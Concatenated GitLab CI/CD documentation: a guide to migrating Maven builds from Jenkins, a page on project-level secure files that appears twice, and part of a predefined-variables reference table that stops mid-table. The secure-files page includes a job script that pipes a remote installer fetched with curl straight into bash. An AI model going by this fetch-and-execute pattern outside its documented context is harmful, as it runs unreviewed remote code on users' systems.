--- stage: Verify group: Pipeline Authoring info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Migrate a Maven build from Jenkins to GitLab CI/CD breadcrumbs: - doc - ci - migration - examples --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} If you have a Maven build in Jenkins, you can use a [Java Spring](https://gitlab.com/gitlab-org/project-templates/spring) project template to migrate to GitLab. The template uses Maven for its underlying dependency management. ## Sample Jenkins configurations The following three Jenkins examples each use different methods to test, build, and install a Maven project into a shell agent: - Freestyle with shell execution - Freestyle with the Maven task plugin - A declarative pipeline using a Jenkinsfile All three examples run the same three commands in order, in three different stages: - `mvn test`: Run any tests found in the codebase - `mvn package -DskipTests`: Compile the code into an executable type defined in the POM and skip running any tests because that was done in the first stage. - `mvn install -DskipTests`: Install the compiled executable into the agent's local Maven `.m2` repository and again skip running the tests. These examples use a single, persistent Jenkins agent, which requires Maven to be pre-installed on the agent. This method of execution is similar to a GitLab Runner using the [shell executor](https://docs.gitlab.com/runner/executors/shell.html). ### Freestyle with shell execution If using Jenkins' built-in shell execution option to directly call `mvn` commands from the shell on the agent, the configuration might look like: ![Jenkins UI that shows build steps with Maven commands defined as shell commands.](img/maven-freestyle-shell_v16_4.png) ### Freestyle with Maven task plugin If using the Maven plugin in Jenkins to declare and execute any specific goals in the [Maven build lifecycle](https://maven.apache.org/guides/introduction/introduction-to-the-lifecycle.html), the configuration might look like: ![Jenkins UI that shows build steps with Maven commands defined using the Maven plugin.](img/maven-freestyle-plugin_v16_4.png) This plugin requires Maven to be installed on the Jenkins agent, and uses a script wrapper for calling Maven commands. ### Using a declarative pipeline If using a declarative pipeline, the configuration might look like: ```groovy pipeline { agent any tools { maven 'maven-3.6.3' jdk 'jdk11' } stages { stage('Build') { steps { sh "mvn package -DskipTests" } } stage('Test') { steps { sh "mvn test" } } stage('Install') { steps { sh "mvn install -DskipTests" } } } } ``` This example uses shell execution commands instead of plugins. By default, a declarative pipeline configuration is stored either in the Jenkins pipeline configuration or directly in the Git repository in a `Jenksinfile`. ## Convert Jenkins configuration to GitLab CI/CD While the previous examples are all slightly different, they can all be migrated to GitLab CI/CD with the same pipeline configuration. Prerequisites: - A GitLab Runner with a Shell executor - Maven 3.6.3 and Java 11 JDK installed on the shell runner This example mimics the behavior and syntax of building, testing, and installing on Jenkins. In a GitLab CI/CD pipeline, the commands run in "jobs", which are grouped into stages. The migrated configuration in the `.gitlab-ci.yml` configuration file consists of two global keywords (`stages` and `variables`) followed by 3 jobs: ```yaml stages: - build - test - install variables: MAVEN_OPTS: >- -Dhttps.protocols=TLSv1.2 -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository MAVEN_CLI_OPTS: >- -DskipTests build-JAR: stage: build script: - mvn $MAVEN_CLI_OPTS package test-code: stage: test script: - mvn test install-JAR: stage: install script: - mvn $MAVEN_CLI_OPTS install ``` In this example: - `stages` defines three stages that run in order. Like the previous Jenkins examples, the test job runs first, followed by the build job, and finally the install job. - `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs: - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed: - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any HTTP requests in the pipeline. - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local Maven repository to the GitLab project directory on the runner, so the job can access and modify the repository. - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands: - `-DskipTests` skips the `test` stage in the Maven build lifecycle. - `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs to run in the pipeline: - `stage` defines which stage the job runs in. A pipeline contains one or more stages and a stage contains one or more jobs. This example has three stages, each with a single job. - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`. Jobs can run multiple commands in sequence, which run in the image container, but in this example the jobs run only one command each. ### Run jobs in Docker containers Instead of using a persistent machine for handling this build process like the Jenkins samples, this example uses an ephemeral Docker container to handle execution. Using a container removes the need for maintaining a virtual machine and the Maven version installed on it. It also increases flexibility for expanding and extending the functionality of the pipeline. Prerequisites: - A GitLab Runner with the Docker executor that can be used by the project. If you are using GitLab.com, you can use the public instance runners. This migrated pipeline configuration consists of three global keywords (`stages`, `default`, and `variables`) followed by 3 jobs. This configuration makes use of additional GitLab CI/CD features for an improved pipeline compared to the [previous example](#convert-jenkins-configuration-to-gitlab-cicd): ```yaml stages: - build - test - install default: image: maven:3.6.3-openjdk-11 cache: key: $CI_COMMIT_REF_SLUG paths: - .m2/ variables: MAVEN_OPTS: >- -Dhttps.protocols=TLSv1.2 -Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository MAVEN_CLI_OPTS: >- -DskipTests build-JAR: stage: build script: - mvn $MAVEN_CLI_OPTS package test-code: stage: test script: - mvn test install-JAR: stage: install script: - mvn $MAVEN_CLI_OPTS install ``` In this example: - `stages` defines three stages that run in order. Like the previous Jenkins examples, the test job runs first, followed by the build job, and finally the install job. - `default` defines standard configuration to reuse in all jobs by default: - `image` defines the Docker image container to use and execute commands in. In this example, it's an official Maven Docker image with everything needed already installed. - `cache` is used to cache and reuse dependencies: - `key` is the unique identifier for the specific cache archive. In this example, it's a shortened version of the Git commit ref, autogenerated as a [predefined CI/CD variable](../../variables/predefined_variables.md). Any job that runs for the same commit ref reuses the same cache. - `paths` are the directories or files to include in the cache. In this example, we cache the `.m2/` directory to avoid re-installing dependencies between job runs. - `variables` defines [CI/CD variables](../../variables/_index.md) that can be used by all jobs: - `MAVEN_OPTS` are Maven environment variables needed whenever Maven is executed: - `-Dhttps.protocols=TLSv1.2` sets the TLS protocol to version 1.2 for any HTTP requests in the pipeline. - `-Dmaven.repo.local=$CI_PROJECT_DIR/.m2/repository` sets the location of the local Maven repository to the GitLab project directory on the runner, so the job can access and modify the repository. - `MAVEN_CLI_OPTS` are specific arguments to be added to `mvn` commands: - `-DskipTests` skips the `test` stage in the Maven build lifecycle. - `test-code`, `build-JAR`, and `install-JAR` are the user-defined names for the jobs to run in the pipeline: - `stage` defines which stage the job runs in. A pipeline contains one or more stages and a stage contains one or more jobs. This example has three stages, each with a single job. - `script` defines the commands to run in that job, similar to `steps` in a `Jenkinsfile`. Jobs can run multiple commands in sequence, which run in the image container, but in this example the jobs run only one command each.
https://docs.gitlab.com/ci/secure_files
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/_index.md
2025-08-13
doc/ci/secure_files
[ "doc", "ci", "secure_files" ]
_index.md
Software Supply Chain Security
Pipeline Security
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Project-level secure files
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/350748) and feature flag `ci_secure_files` removed in GitLab 15.7. {{< /history >}} This feature is part of [Mobile DevOps](../mobile_devops/_index.md). The feature is still in development, but you can: - [Request a feature](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=feature_request). - [Report a bug](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=report_bug). - [Share feedback](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=general_feedback). You can securely store up to 100 files for use in CI/CD pipelines as secure files. These files are stored securely outside of your project's repository and are not version controlled. It is safe to store sensitive information in these files. Secure files support both plain text and binary file types but must be 5 MB or less. You can manage secure files in the project settings, or with the [secure files API](../../api/secure_files.md). Secure files can be [downloaded and used by CI/CD jobs](#use-secure-files-in-cicd-jobs) by using the [download-secure-files](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files) tool. ## Add a secure file to a project To add a secure file to a project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand the **Secure Files** section. 1. Select **Upload File**. 1. Find the file to upload, select **Open**, and the file upload begins immediately. The file shows up in the list when the upload is complete. ## Use secure files in CI/CD jobs ### With the `download-secure-files` tool To use your secure files in a CI/CD job, you can use the [`download-secure-files`](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files) tool to download the files in the job. After they are downloaded, you can use them with your other script commands. Add a command in the `script` section of your job to download the `download-secure-files` tool and execute it. The files download into a `.secure_files` directory in the root of the project. To change the download location for the secure files, set the path in the `SECURE_FILES_DOWNLOAD_PATH` [CI/CD variable](../variables/_index.md). For example: ```yaml test: variables: SECURE_FILES_DOWNLOAD_PATH: './where/files/should/go/' script: - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash ``` {{< alert type="warning" >}} The content of files loaded with the `download-secure-files` tool are not [masked](../variables/_index.md#mask-a-cicd-variable) in the job log output. Make sure to avoid outputting secure file contents in the job log, especially when logging output that could contain sensitive information. {{< /alert >}} ### With the `glab` tool To download one or more secure files with [`glab`](https://gitlab.com/gitlab-org/cli/), you can use the `cli` Docker image in the CI/CD job. For example: ```yaml test: image: registry.gitlab.com/gitlab-org/cli:latest script: - export GITLAB_HOST=$CI_SERVER_URL - glab auth login --job-token $CI_JOB_TOKEN --hostname $CI_SERVER_FQDN --api-protocol $CI_SERVER_PROTOCOL - glab -R $CI_PROJECT_PATH securefile download $SECURE_FILE_ID --path="where/to/save/file.txt" ``` The `SECURE_FILE_ID` CI/CD variable needs to passed to the job explicitly, for example in [CI/CD settings](../variables/_index.md#define-a-cicd-variable-in-the-ui) or when [running a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually). Every other variable is a [predefined variable](../variables/predefined_variables.md) that is automatically available. Alternatively, instead of using the Docker image, you can [download the binary](https://gitlab.com/gitlab-org/cli/-/releases). and use it in your CI/CD job. ## Security details Project-level Secure Files are encrypted on upload using the [Lockbox](https://github.com/ankane/lockbox) Ruby gem by using the [`Ci::SecureFileUploader`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/uploaders/ci/secure_file_uploader.rb) interface. This interface generates a SHA256 checksum of the source file during upload that is persisted with the record in the database so it can be used to verify the contents of the file when downloaded. A [unique encryption key](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/models/ci/secure_file.rb#L27) is generated for each file when it is created and persisted in the database. The encrypted uploaded files are stored in either local storage or object storage depending on the [GitLab instance configuration](../../administration/cicd/secure_files.md). Individual files can be retrieved with the [secure files download API](../../api/secure_files.md#download-secure-file). Metadata can be retrieved with the [list](../../api/secure_files.md#list-project-secure-files) or [show](../../api/secure_files.md#show-secure-file-details) API endpoints. Files can also be retrieved with the [`download-secure-files`](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files) tool. This tool automatically verifies the checksum of each file as it is downloaded. Any project member with at least the Developer role can access Project-level secure files. Interactions with Project-level secure files are not included in audit events, but [issue 117](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/readme/-/issues/117) proposes adding this functionality.
--- stage: Software Supply Chain Security group: Pipeline Security info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments title: Project-level secure files breadcrumbs: - doc - ci - secure_files --- {{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} {{< history >}} - [Generally available](https://gitlab.com/gitlab-org/gitlab/-/issues/350748) and feature flag `ci_secure_files` removed in GitLab 15.7. {{< /history >}} This feature is part of [Mobile DevOps](../mobile_devops/_index.md). The feature is still in development, but you can: - [Request a feature](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=feature_request). - [Report a bug](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=report_bug). - [Share feedback](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/feedback/-/issues/new?issuable_template=general_feedback). You can securely store up to 100 files for use in CI/CD pipelines as secure files. These files are stored securely outside of your project's repository and are not version controlled. It is safe to store sensitive information in these files. Secure files support both plain text and binary file types but must be 5 MB or less. You can manage secure files in the project settings, or with the [secure files API](../../api/secure_files.md). Secure files can be [downloaded and used by CI/CD jobs](#use-secure-files-in-cicd-jobs) by using the [download-secure-files](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files) tool. ## Add a secure file to a project To add a secure file to a project: 1. On the left sidebar, select **Search or go to** and find your project. 1. Select **Settings > CI/CD**. 1. Expand the **Secure Files** section. 1. Select **Upload File**. 1. Find the file to upload, select **Open**, and the file upload begins immediately. The file shows up in the list when the upload is complete. ## Use secure files in CI/CD jobs ### With the `download-secure-files` tool To use your secure files in a CI/CD job, you can use the [`download-secure-files`](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files) tool to download the files in the job. After they are downloaded, you can use them with your other script commands. Add a command in the `script` section of your job to download the `download-secure-files` tool and execute it. The files download into a `.secure_files` directory in the root of the project. To change the download location for the secure files, set the path in the `SECURE_FILES_DOWNLOAD_PATH` [CI/CD variable](../variables/_index.md). For example: ```yaml test: variables: SECURE_FILES_DOWNLOAD_PATH: './where/files/should/go/' script: - curl --silent "https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files/-/raw/main/installer" | bash ``` {{< alert type="warning" >}} The content of files loaded with the `download-secure-files` tool are not [masked](../variables/_index.md#mask-a-cicd-variable) in the job log output. Make sure to avoid outputting secure file contents in the job log, especially when logging output that could contain sensitive information. {{< /alert >}} ### With the `glab` tool To download one or more secure files with [`glab`](https://gitlab.com/gitlab-org/cli/), you can use the `cli` Docker image in the CI/CD job. For example: ```yaml test: image: registry.gitlab.com/gitlab-org/cli:latest script: - export GITLAB_HOST=$CI_SERVER_URL - glab auth login --job-token $CI_JOB_TOKEN --hostname $CI_SERVER_FQDN --api-protocol $CI_SERVER_PROTOCOL - glab -R $CI_PROJECT_PATH securefile download $SECURE_FILE_ID --path="where/to/save/file.txt" ``` The `SECURE_FILE_ID` CI/CD variable needs to passed to the job explicitly, for example in [CI/CD settings](../variables/_index.md#define-a-cicd-variable-in-the-ui) or when [running a pipeline manually](../pipelines/_index.md#run-a-pipeline-manually). Every other variable is a [predefined variable](../variables/predefined_variables.md) that is automatically available. Alternatively, instead of using the Docker image, you can [download the binary](https://gitlab.com/gitlab-org/cli/-/releases). and use it in your CI/CD job. ## Security details Project-level Secure Files are encrypted on upload using the [Lockbox](https://github.com/ankane/lockbox) Ruby gem by using the [`Ci::SecureFileUploader`](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/uploaders/ci/secure_file_uploader.rb) interface. This interface generates a SHA256 checksum of the source file during upload that is persisted with the record in the database so it can be used to verify the contents of the file when downloaded. A [unique encryption key](https://gitlab.com/gitlab-org/gitlab/-/blob/master/app/models/ci/secure_file.rb#L27) is generated for each file when it is created and persisted in the database. The encrypted uploaded files are stored in either local storage or object storage depending on the [GitLab instance configuration](../../administration/cicd/secure_files.md). Individual files can be retrieved with the [secure files download API](../../api/secure_files.md#download-secure-file). Metadata can be retrieved with the [list](../../api/secure_files.md#list-project-secure-files) or [show](../../api/secure_files.md#show-secure-file-details) API endpoints. Files can also be retrieved with the [`download-secure-files`](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/download-secure-files) tool. This tool automatically verifies the checksum of each file as it is downloaded. Any project member with at least the Developer role can access Project-level secure files. Interactions with Project-level secure files are not included in audit events, but [issue 117](https://gitlab.com/gitlab-org/incubation-engineering/mobile-devops/readme/-/issues/117) proposes adding this functionality.
https://docs.gitlab.com/ci/predefined_variables
https://gitlab.com/gitlab-org/gitlab/-/tree/master/doc/ci/predefined_variables.md
2025-08-13
doc/ci/variables
[ "doc", "ci", "variables" ]
predefined_variables.md
Verify
Pipeline Authoring
To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
Predefined CI/CD variables reference
null
{{< details >}} - Tier: Free, Premium, Ultimate - Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated {{< /details >}} Predefined [CI/CD variables](_index.md) are available in every GitLab CI/CD pipeline. Avoid [overriding](_index.md#use-pipeline-variables) predefined variables, as it can cause the pipeline to behave unexpectedly. ## Variable availability Predefined variables become available at three different phases of pipeline execution: - Pre-pipeline: Pre-pipeline variables are available before the pipeline is created. These variables are the only variables that can be used with [`include:rules`](../yaml/_index.md#includerules) to control which configuration files to use when creating the pipeline. - Pipeline: Pipeline variables become available when GitLab is creating the pipeline. Along with pre-pipeline variables, pipeline variables can be used to configure [`rules`](../yaml/_index.md#rules) defined in jobs, to determine which jobs to add to the pipeline. - Job-only: These variables are only made available to each job when a runner picks up the job and runs it, and: - Can be used in job scripts. - Cannot be used with [trigger jobs](../pipelines/downstream_pipelines.md#trigger-a-downstream-pipeline-from-a-job-in-the-gitlab-ciyml-file). - Cannot be used with [`workflow`](../yaml/_index.md#workflow), [`include`](../yaml/_index.md#include) or [`rules`](../yaml/_index.md#rules). ## Predefined variables | Variable | Availability | Description | |-------------------------------------------------|--------------|-------------| | `CHAT_CHANNEL` | Pipeline | The Source chat channel that triggered the [ChatOps](../chatops/_index.md) command. | | `CHAT_INPUT` | Pipeline | The additional arguments passed with the [ChatOps](../chatops/_index.md) command. | | `CHAT_USER_ID` | Pipeline | The chat service's user ID of the user who triggered the [ChatOps](../chatops/_index.md) command. | | `CI` | Pre-pipeline | Available for all jobs executed in CI/CD. `true` when available. | | `CI_API_V4_URL` | Pre-pipeline | The GitLab API v4 root URL. | | `CI_API_GRAPHQL_URL` | Pre-pipeline | The GitLab API GraphQL root URL. Introduced in GitLab 15.11. | | `CI_BUILDS_DIR` | Job-only | The top-level directory where builds are executed. | | `CI_COMMIT_AUTHOR` | Pre-pipeline | The author of the commit in `Name <email>` format. | | `CI_COMMIT_BEFORE_SHA` | Pre-pipeline | The previous latest commit present on a branch or tag. Is always `0000000000000000000000000000000000000000` for merge request pipelines, scheduled pipelines, the first commit in pipelines for branches or tags, or when manually running a pipeline. | | `CI_COMMIT_BRANCH` | Pre-pipeline | The commit branch name. Available in branch pipelines, including pipelines for the default branch. Not available in merge request pipelines or tag pipelines. | | `CI_COMMIT_DESCRIPTION` | Pre-pipeline | The description of the commit. If the title is shorter than 100 characters, the message without the first line. | | `CI_COMMIT_MESSAGE` | Pre-pipeline | The full commit message. | | `CI_COMMIT_REF_NAME` | Pre-pipeline | The branch or tag name for which project is built. | | `CI_COMMIT_REF_PROTECTED` | Pre-pipeline | `true` if the job is running for a protected reference, `false` otherwise. | | `CI_COMMIT_REF_SLUG` | Pre-pipeline | `CI_COMMIT_REF_NAME` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in URLs, host names and domain names. | | `CI_COMMIT_SHA` | Pre-pipeline | The commit revision the project is built for. | | `CI_COMMIT_SHORT_SHA` | Pre-pipeline | The first eight characters of `CI_COMMIT_SHA`. | | `CI_COMMIT_TAG` | Pre-pipeline | The commit tag name. Available only in pipelines for tags. | | `CI_COMMIT_TAG_MESSAGE` | Pre-pipeline | The commit tag message. Available only in pipelines for tags. Introduced in GitLab 15.5. | | `CI_COMMIT_TIMESTAMP` | Pre-pipeline | The timestamp of the commit in the [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_COMMIT_TITLE` | Pre-pipeline | The title of the commit. The full first line of the message. | | `CI_CONCURRENT_ID` | Job-only | The unique ID of build execution in a single executor. | | `CI_CONCURRENT_PROJECT_ID` | Job-only | The unique ID of build execution in a single executor and project. | | `CI_CONFIG_PATH` | Pre-pipeline | The path to the CI/CD configuration file. Defaults to `.gitlab-ci.yml`. | | `CI_DEBUG_TRACE` | Pipeline | `true` if [debug logging (tracing)](variables_troubleshooting.md#enable-debug-logging) is enabled. | | `CI_DEBUG_SERVICES` | Pipeline | `true` if [service container logging](../services/_index.md#capturing-service-container-logs) is enabled. Introduced in GitLab 15.7. Requires GitLab Runner 15.7. | | `CI_DEFAULT_BRANCH` | Pre-pipeline | The name of the project's default branch. | | `CI_DEFAULT_BRANCH_SLUG` | Pre-pipeline | `CI_DEFAULT_BRANCH` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in URLs, host names and domain names. | | `CI_DEPENDENCY_PROXY_DIRECT_GROUP_IMAGE_PREFIX` | Pre-pipeline | The direct group image prefix for pulling images through the Dependency Proxy. | | `CI_DEPENDENCY_PROXY_GROUP_IMAGE_PREFIX` | Pre-pipeline | The top-level group image prefix for pulling images through the Dependency Proxy. | | `CI_DEPENDENCY_PROXY_PASSWORD` | Pipeline | The password to pull images through the Dependency Proxy. | | `CI_DEPENDENCY_PROXY_SERVER` | Pre-pipeline | The server for logging in to the Dependency Proxy. This variable is equivalent to `$CI_SERVER_HOST:$CI_SERVER_PORT`. | | `CI_DEPENDENCY_PROXY_USER` | Pipeline | The username to pull images through the Dependency Proxy. | | `CI_DEPLOY_FREEZE` | Pre-pipeline | Only available if the pipeline runs during a [deploy freeze window](../../user/project/releases/_index.md#prevent-unintentional-releases-by-setting-a-deploy-freeze). `true` when available. | | `CI_DEPLOY_PASSWORD` | Job-only | The authentication password of the [GitLab Deploy Token](../../user/project/deploy_tokens/_index.md#gitlab-deploy-token), if the project has one. | | `CI_DEPLOY_USER` | Job-only | The authentication username of the [GitLab Deploy Token](../../user/project/deploy_tokens/_index.md#gitlab-deploy-token), if the project has one. | | `CI_DISPOSABLE_ENVIRONMENT` | Pipeline | Only available if the job is executed in a disposable environment (something that is created only for this job and disposed of/destroyed after the execution - all executors except `shell` and `ssh`). `true` when available. | | `CI_ENVIRONMENT_ID` | Pipeline | The ID of the environment for this job. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. | | `CI_ENVIRONMENT_NAME` | Pipeline | The name of the environment for this job. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. | | `CI_ENVIRONMENT_SLUG` | Pipeline | The simplified version of the environment name, suitable for inclusion in DNS, URLs, Kubernetes labels, and so on. Available if [`environment:name`](../yaml/_index.md#environmentname) is set. The slug is [truncated to 24 characters](https://gitlab.com/gitlab-org/gitlab/-/issues/20941). A random suffix is automatically added to [uppercase environment names](https://gitlab.com/gitlab-org/gitlab/-/issues/415526). | | `CI_ENVIRONMENT_URL` | Pipeline | The URL of the environment for this job. Available if [`environment:url`](../yaml/_index.md#environmenturl) is set. | | `CI_ENVIRONMENT_ACTION` | Pipeline | The action annotation specified for this job's environment. Available if [`environment:action`](../yaml/_index.md#environmentaction) is set. Can be `start`, `prepare`, or `stop`. | | `CI_ENVIRONMENT_TIER` | Pipeline | The [deployment tier of the environment](../environments/_index.md#deployment-tier-of-environments) for this job. | | `CI_GITLAB_FIPS_MODE` | Pre-pipeline | Only available if [FIPS mode](../../development/fips_gitlab.md) is enabled in the GitLab instance. `true` when available. | | `CI_HAS_OPEN_REQUIREMENTS` | Pipeline | Only available if the pipeline's project has an open [requirement](../../user/project/requirements/_index.md). `true` when available. | | `CI_JOB_GROUP_NAME` | Pipeline | The shared name of a group of jobs, when using either [`parallel`](../yaml/_index.md#parallel) or [manually grouped jobs](../jobs/_index.md#group-similar-jobs-together-in-pipeline-views). For example, if the job name is `rspec:test: [ruby, ubuntu]`, the `CI_JOB_GROUP_NAME` is `rspec:test`. It is the same as `CI_JOB_NAME` otherwise. Introduced in GitLab 17.10. | | `CI_JOB_ID` | Job-only | The internal ID of the job, unique across all jobs in the GitLab instance. | | `CI_JOB_IMAGE` | Pipeline | The name of the Docker image running the job. | | `CI_JOB_MANUAL` | Pipeline | Only available if the job was started manually. `true` when available. | | `CI_JOB_NAME` | Pipeline | The name of the job. | | `CI_JOB_NAME_SLUG` | Pipeline | `CI_JOB_NAME` in lowercase, shortened to 63 bytes, and with everything except `0-9` and `a-z` replaced with `-`. No leading / trailing `-`. Use in paths. Introduced in GitLab 15.4. | | `CI_JOB_STAGE` | Pipeline | The name of the job's stage. | | `CI_JOB_STATUS` | Job-only | The status of the job as each runner stage is executed. Use with [`after_script`](../yaml/_index.md#after_script). Can be `success`, `failed`, or `canceled`. | | `CI_JOB_TIMEOUT` | Job-only | The job timeout, in seconds. Introduced in GitLab 15.7. Requires GitLab Runner 15.7. | | `CI_JOB_TOKEN` | Job-only | A token to authenticate with [certain API endpoints](../jobs/ci_job_token.md). The token is valid as long as the job is running. | | `CI_JOB_URL` | Job-only | The job details URL. | | `CI_JOB_STARTED_AT` | Job-only | The date and time when a job started, in [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_KUBERNETES_ACTIVE` | Pre-pipeline | Only available if the pipeline has a Kubernetes cluster available for deployments. `true` when available. | | `CI_NODE_INDEX` | Pipeline | The index of the job in the job set. Only available if the job uses [`parallel`](../yaml/_index.md#parallel). | | `CI_NODE_TOTAL` | Pipeline | The total number of instances of this job running in parallel. Set to `1` if the job does not use [`parallel`](../yaml/_index.md#parallel). | | `CI_OPEN_MERGE_REQUESTS` | Pre-pipeline | A comma-separated list of up to four merge requests that use the current branch and project as the merge request source. Only available in branch and merge request pipelines if the branch has an associated merge request. For example, `gitlab-org/gitlab!333,gitlab-org/gitlab-foss!11`. | | `CI_PAGES_DOMAIN` | Pre-pipeline | The instance's domain that hosts GitLab Pages, not including the namespace subdomain. To use the full hostname, use `CI_PAGES_HOSTNAME` instead. | | `CI_PAGES_HOSTNAME` | Job-only | The full hostname of the Pages deployment. | | `CI_PAGES_URL` | Job-only | The URL for a GitLab Pages site. Always a subdomain of `CI_PAGES_DOMAIN`. In GitLab 17.9 and later, the value includes the `path_prefix` when one is specified. | | `CI_PIPELINE_ID` | Job-only | The instance-level ID of the current pipeline. This ID is unique across all projects on the GitLab instance. | | `CI_PIPELINE_IID` | Pipeline | The project-level IID (internal ID) of the current pipeline. This ID is unique only in the current project. | | `CI_PIPELINE_SOURCE` | Pre-pipeline | How the pipeline was triggered. The value can be one of the [pipeline sources](../jobs/job_rules.md#ci_pipeline_source-predefined-variable). | | `CI_PIPELINE_TRIGGERED` | Pipeline | `true` if the job was [triggered](../triggers/_index.md). | | `CI_PIPELINE_URL` | Job-only | The URL for the pipeline details. | | `CI_PIPELINE_CREATED_AT` | Job-only | The date and time when the pipeline was created, in [ISO 8601](https://www.rfc-editor.org/rfc/rfc3339#appendix-A) format. For example, `2022-01-31T16:47:55Z`. [UTC by default](../../administration/timezone.md). | | `CI_PIPELINE_NAME` | Pre-pipeline | The pipeline name defined in [`workflow:name`](../yaml/_index.md#workflowname). Introduced in GitLab 16.3. | | `CI_PIPELINE_SCHEDULE_DESCRIPTION` | Pre-pipeline | The description of the pipeline schedule. Only available in scheduled pipelines. Introduced in GitLab 17.8. | | `CI_PROJECT_DIR` | Job-only | The full path the repository is cloned to, and where the job runs from. If the GitLab Runner `builds_dir` parameter is set, this variable is set relative to the value of `builds_dir`. For more information, see the [Advanced GitLab Runner configuration](https://docs.gitlab.com/runner/configuration/advanced-configuration.html#the-runners-section). | | `CI_PROJECT_ID` | Pre-pipeline | The ID of the current project. This ID is unique across all projects on the GitLab instance. | | `CI_PROJECT_NAME` | Pre-pipeline | The name of the directory for the project. For example if the project URL is `gitlab.example.com/group-name/project-1`, `CI_PROJECT_NAME` is `project-1`. | | `CI_PROJECT_NAMESPACE` | Pre-pipeline | The project namespace (username or group name) of the job. | | `CI_PROJECT_NAMESPACE_ID` | Pre-pipeline | The project namespace ID of the job. Introduced in GitLab 15.7. | | `CI_PROJECT_NAMESPACE_SLUG` | Pre-pipeline | `$CI_PROJECT_NAMESPACE` in lowercase with characters that are not `a-z` or `0-9` replaced with - and shortened to 63 bytes. | | `CI_PROJECT_PATH_SLUG` | Pre-pipeline | `$CI_PROJECT_PATH` in lowercase with characters that are not `a-z` or `0-9` replaced with `-` and shortened to 63 bytes. Use in URLs and domain names. | | `CI_PROJECT_PATH` | Pre-pipeline | The project namespace with the project name included. | | `CI_PROJECT_REPOSITORY_LANGUAGES` | Pre-pipeline | A comma-separated, lowercase list of the languages used in the repository. For example `ruby,javascript,html,css`. The maximum number of languages is limited to 5. An issue [proposes to increase the limit](https://gitlab.com/gitlab-org/gitlab/-/issues/368925). | | `CI_PROJECT_ROOT_NAMESPACE` | Pre-pipeline | The root project namespace (username or group name) of the job. For example, if `CI_PROJECT_NAMESPACE` is `root-group/child-group/grandchild-group`, `CI_PROJECT_ROOT_NAMESPACE` is `root-group`. | | `CI_PROJECT_TITLE` | Pre-pipeline | The human-readable project name as displayed in the GitLab web interface. | | `CI_PROJECT_DESCRIPTION` | Pre-pipeline | The project description as displayed in the GitLab web interface. Introduced in GitLab 15.1. | | `CI_PROJECT_TOPICS` | Pre-pipeline | A comma-separated, lowercase list of [topics](../../user/project/project_topics.md) (limited to the first 20) assigned to the project. Introduced in GitLab 18.3 | | `CI_PROJECT_URL` | Pre-pipeline | The HTTP(S) address of the project. | | `CI_PROJECT_VISIBILITY` | Pre-pipeline | The project visibility. Can be `internal`, `private`, or `public`. | | `CI_PROJECT_CLASSIFICATION_LABEL` | Pre-pipeline | The project [external authorization classification label](../../administration/settings/external_authorization.md). | | `CI_REGISTRY` | Pre-pipeline | Address of the [container registry](../../user/packages/container_registry/_index.md) server, formatted as `<host>[:<port>]`. For example: `registry.gitlab.example.com`. Only available if the container registry is enabled for the GitLab instance. | | 